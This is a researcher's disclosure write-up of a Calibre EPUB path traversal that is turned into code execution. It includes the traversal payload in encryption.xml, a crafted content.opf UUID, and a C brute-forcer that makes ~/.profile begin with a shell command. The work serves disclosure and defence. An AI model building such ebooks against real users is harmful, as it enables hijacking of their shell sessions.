CVE-2026-25636: From Ebook to Owned — Calibre EPUB Path Traversal to RCE

0x5t
0x5t avatar
Security Researcher
Team: RaptX
Posts: --
Joined: 2024
Posted:  |  Tags: RCE, Path Traversal, Calibre  |  CVSS 8.0 HIGH
CVE-2026-25636: Calibre EPUB Path Traversal to RCE — attack chain diagram
TL;DR: A path traversal vulnerability in Calibre 9.1.0's EPUB conversion allows a malicious ebook to corrupt arbitrary files on the victim's system. By targeting shell initialization scripts like ~/.profile and brute-forcing a UUID that produces specific XOR output, this file corruption can be weaponized into code execution. When the victim logs in or sources their profile, attacker-controlled commands execute.

Vulnerability Chain: LFI → Arbitrary File Corruption → Code Execution

Introduction

Calibre is one of the most popular ebook management applications, with millions of users worldwide. It handles various ebook formats, converts between them, and manages libraries. Given its widespread use and the fact that users regularly open ebooks from untrusted sources (online libraries, torrents, email attachments), any vulnerability in Calibre's file processing is worth investigating.

This writeup details a vulnerability I discovered in Calibre 9.1.0's EPUB processing that chains together several weaknesses to achieve code execution from a malicious ebook file.

The Discovery

While auditing Calibre's source code, I focused on the EPUB conversion pipeline. EPUBs are essentially ZIP archives containing XML metadata, XHTML content, and embedded resources like fonts and images. One interesting feature caught my attention: IDPF font obfuscation.

The IDPF (International Digital Publishing Forum) specification includes a method for "obfuscating" embedded fonts to prevent casual extraction. This isn't encryption—it's a simple XOR operation using the book's UUID as a key. Calibre implements this in src/calibre/ebooks/conversion/plugins/epub_input.py.

The vulnerability lies in how Calibre resolves the paths to these "encrypted" resources.

Technical Deep Dive

The Vulnerable Code

In epub_input.py, the process_encryption() function handles font decryption:

def process_encryption(self, encfile, opf, log):
    # ...
    for em in root.xpath('descendant::*[contains(name(), "EncryptionMethod")]'):
        cr = em.getparent().xpath('descendant::*[contains(name(), "CipherReference")]')[0]
        uri = cr.get('URI')  # Attacker-controlled from encryption.xml

        # LINE 75 - PATH TRAVERSAL
        path = os.path.abspath(os.path.join(os.path.dirname(encfile), '..', *uri.split('/')))

        if (tkey and os.path.exists(path)):
            decrypt_font(tkey, path, algorithm)  # LINE 79 - Corrupts the file

The critical issues:

  1. uri is extracted directly from META-INF/encryption.xml without any sanitization
  2. *uri.split('/') preserves .. path components
  3. os.path.abspath() resolves the traversal, escaping the EPUB's extraction directory
  4. decrypt_font() opens the resolved path in read-write mode and XORs its contents

The IDPF Obfuscation Algorithm

The decrypt_font() function implements IDPF's font obfuscation:

  1. Compute SHA1(UUID) where UUID is from the book's content.opf
  2. Take the first 20 bytes of the SHA1 hash as the XOR key
  3. XOR the first 1040 bytes of the target file with this key (repeating the 20-byte key)
def decrypt_font(tkey, path, algorithm):
    # tkey = SHA1(UUID)[:20]
    with open(path, 'r+b') as f:
        data = f.read(1040)
        # XOR operation
        decrypted = bytes([data[i] ^ tkey[i % 20] for i in range(len(data))])
        f.seek(0)
        f.write(decrypted)

This means an attacker can:

  1. Use path traversal to target any file writable by Calibre
  2. XOR its first 1040 bytes with a key derived from a UUID the attacker controls

Exploitation: From Corruption to Code Execution

At first glance, XOR corruption seems like a limited primitive. The corruption is deterministic but depends on both the original file content and the UUID. How do we turn this into code execution?

The Key Insight

If we know the original content of a target file, we can calculate what XOR key we need to produce a desired output:

required_key = original_content XOR desired_output

Then we brute-force UUIDs until we find one whose SHA1(UUID) starts with our required key bytes.

Target Selection: Shell Initialization Scripts

On Linux/macOS systems, shell initialization scripts like ~/.profile, ~/.bashrc, and ~/.bash_profile are executed when a user logs in or starts a shell. These files commonly start with predictable content:

# ~/.profile: executed by the command interpreter for login shells.

The first 4 bytes are always # ~/ (hex: 23 20 7e 2f).

Crafting the Payload

I chose two payloads to demonstrate the vulnerability:

Payload 1: id;# - Executes the id command

  • Target bytes: # ~/id;#
  • Hex: 23 20 7e 2f69 64 3b 23
  • Required XOR key: 4a 44 45 0c

Payload 2: sh;# - Spawns an interactive shell

  • Target bytes: # ~/sh;#
  • Hex: 23 20 7e 2f73 68 3b 23
  • Required XOR key: 50 48 45 0c

The # at the end is crucial—it comments out the garbage bytes that follow (the rest of the XOR-corrupted line), preventing syntax errors.

Brute-Forcing the UUID

I wrote a multi-threaded C brute-forcer to find UUIDs whose SHA1 hash starts with the required bytes:

// Target key bytes for sh;# payload
static const uint8_t TARGET_KEY[4] = {0x50, 0x48, 0x45, 0x0c};

void *worker(void *arg) {
    // ...
    while (!found && val < 0x100000000ULL) {
        snprintf(uuid_str, sizeof(uuid_str),
                 "urn:uuid:%08lx-0000-0000-0000-000000000000", val);

        sha1((uint8_t *)uuid_str, 45, sha1_result);

        if (sha1_result[0] == TARGET_KEY[0] &&
            sha1_result[1] == TARGET_KEY[1] &&
            sha1_result[2] == TARGET_KEY[2] &&
            sha1_result[3] == TARGET_KEY[3]) {
            found = 1;
            // Winner!
        }
        val += num_workers;
    }
}

On a 12-core CPU, finding a 4-byte match takes approximately 2-4 minutes.

Results:

[+] FOUND: urn:uuid:cf0909a3-0000-0000-0000-000000000000
    SHA1: 4a44450c... (for id;# payload)

[+] FOUND: urn:uuid:ef9a993a-0000-0000-0000-000000000000
    SHA1: 5048450c... (for sh;# payload)

Building the Malicious EPUB

An EPUB is a ZIP archive with a specific structure:

malicious.epub
├── mimetype                    # Must be first, uncompressed
├── META-INF/
│   ├── container.xml           # Points to content.opf
│   └── encryption.xml          # Contains path traversal payload
└── OEBPS/
    ├── content.opf             # Contains our magic UUID
    └── ch.xhtml                # Minimal chapter content

The Path Traversal Payload (encryption.xml)

<?xml version="1.0" encoding="UTF-8"?>
<encryption xmlns="urn:oasis:names:tc:opendocument:xmlns:container"
            xmlns:enc="http://www.w3.org/2001/04/xmlenc#">
  <enc:EncryptedData>
    <enc:EncryptionMethod Algorithm="http://www.idpf.org/2008/embedding"/>
    <enc:CipherData>
      <enc:CipherReference URI="../../../../../../../../../../home/victim/.profile"/>
    </enc:CipherData>
  </enc:EncryptedData>
</encryption>

The Magic UUID (content.opf)

<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" unique-identifier="uid" version="2.0">
  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/">
    <dc:title>Innocent Book</dc:title>
    <dc:identifier id="uid">urn:uuid:ef9a993a-0000-0000-0000-000000000000</dc:identifier>
  </metadata>
  ...
</package>

The Attack in Action

Step 1: Victim Receives Malicious EPUB

The attacker distributes the malicious EPUB through any channel—email attachment, file sharing, ebook piracy sites, or even compromised legitimate sources.

Step 2: Victim Converts the EPUB

When the victim uses Calibre to convert the ebook (GUI: "Convert books" or CLI: ebook-convert):

$ ebook-convert malicious.epub output.mobi

Step 3: File Corruption Occurs

During conversion, Calibre parses encryption.xml, resolves the traversal path to /home/victim/.profile, and XORs the first 1040 bytes.

Before:

# ~/.profile: executed by the command interpreter for login shells.

After:

sh;#<garbage bytes>

Step 4: Code Execution on Next Login

When the corrupted ~/.profile is sourced, sh;# is interpreted as a command, spawning an interactive shell. The # comments out the garbage bytes.

Impact Analysis

Direct Impacts

  1. Code Execution: Arbitrary commands execute in the user's shell context
  2. Persistence: The corruption persists across reboots until manually fixed
  3. System Instability: Broken initialization scripts cause environment issues

Exploitation Constraints

  • Target file must exist and be writable by Calibre
  • Target file must have predictable first N bytes
  • Brute-force time increases exponentially with payload length:
    • 4 bytes: ~2-4 minutes
    • 5 bytes: ~10-17 hours
    • 6+ bytes: Days to weeks

Platform Testing

Platform Interface Status
Linux CLI (ebook-convert) Vulnerable
Windows GUI (Convert books) Vulnerable

Root Cause Analysis

  1. Missing Input Validation: The URI attribute from encryption.xml is used directly without sanitization
  2. No Path Containment: Calibre doesn't verify that resolved paths remain within the EPUB extraction directory
  3. Unnecessary Write Access: The "decryption" operation opens files in read-write mode
  4. Trust in Untrusted Data: EPUB files from untrusted sources are processed with full privileges

Timeline

Date Event
2025-02-01 Vulnerability discovered
2025-02-01 Code execution escalation confirmed
2026-02-06 Vendor patch release
2026-02-06 Public disclosure

Conclusion

This vulnerability demonstrates how a seemingly limited primitive (XOR file corruption) can be escalated to code execution through careful target selection and cryptographic brute-forcing. The attack requires user interaction (converting an ebook), but given Calibre's widespread use and the common practice of converting ebooks from untrusted sources, the real-world risk is significant.

The vulnerability affects both the GUI and CLI interfaces on Linux and Windows, making it a cross-platform threat. Users should update Calibre immediately.

Acknowledgments

Shoutout to Civiled for walking me through reversing the IDPF encryption algorithm. Figuring out how to weaponize the XOR corruption into controlled output felt like a real-life CTF challenge.

References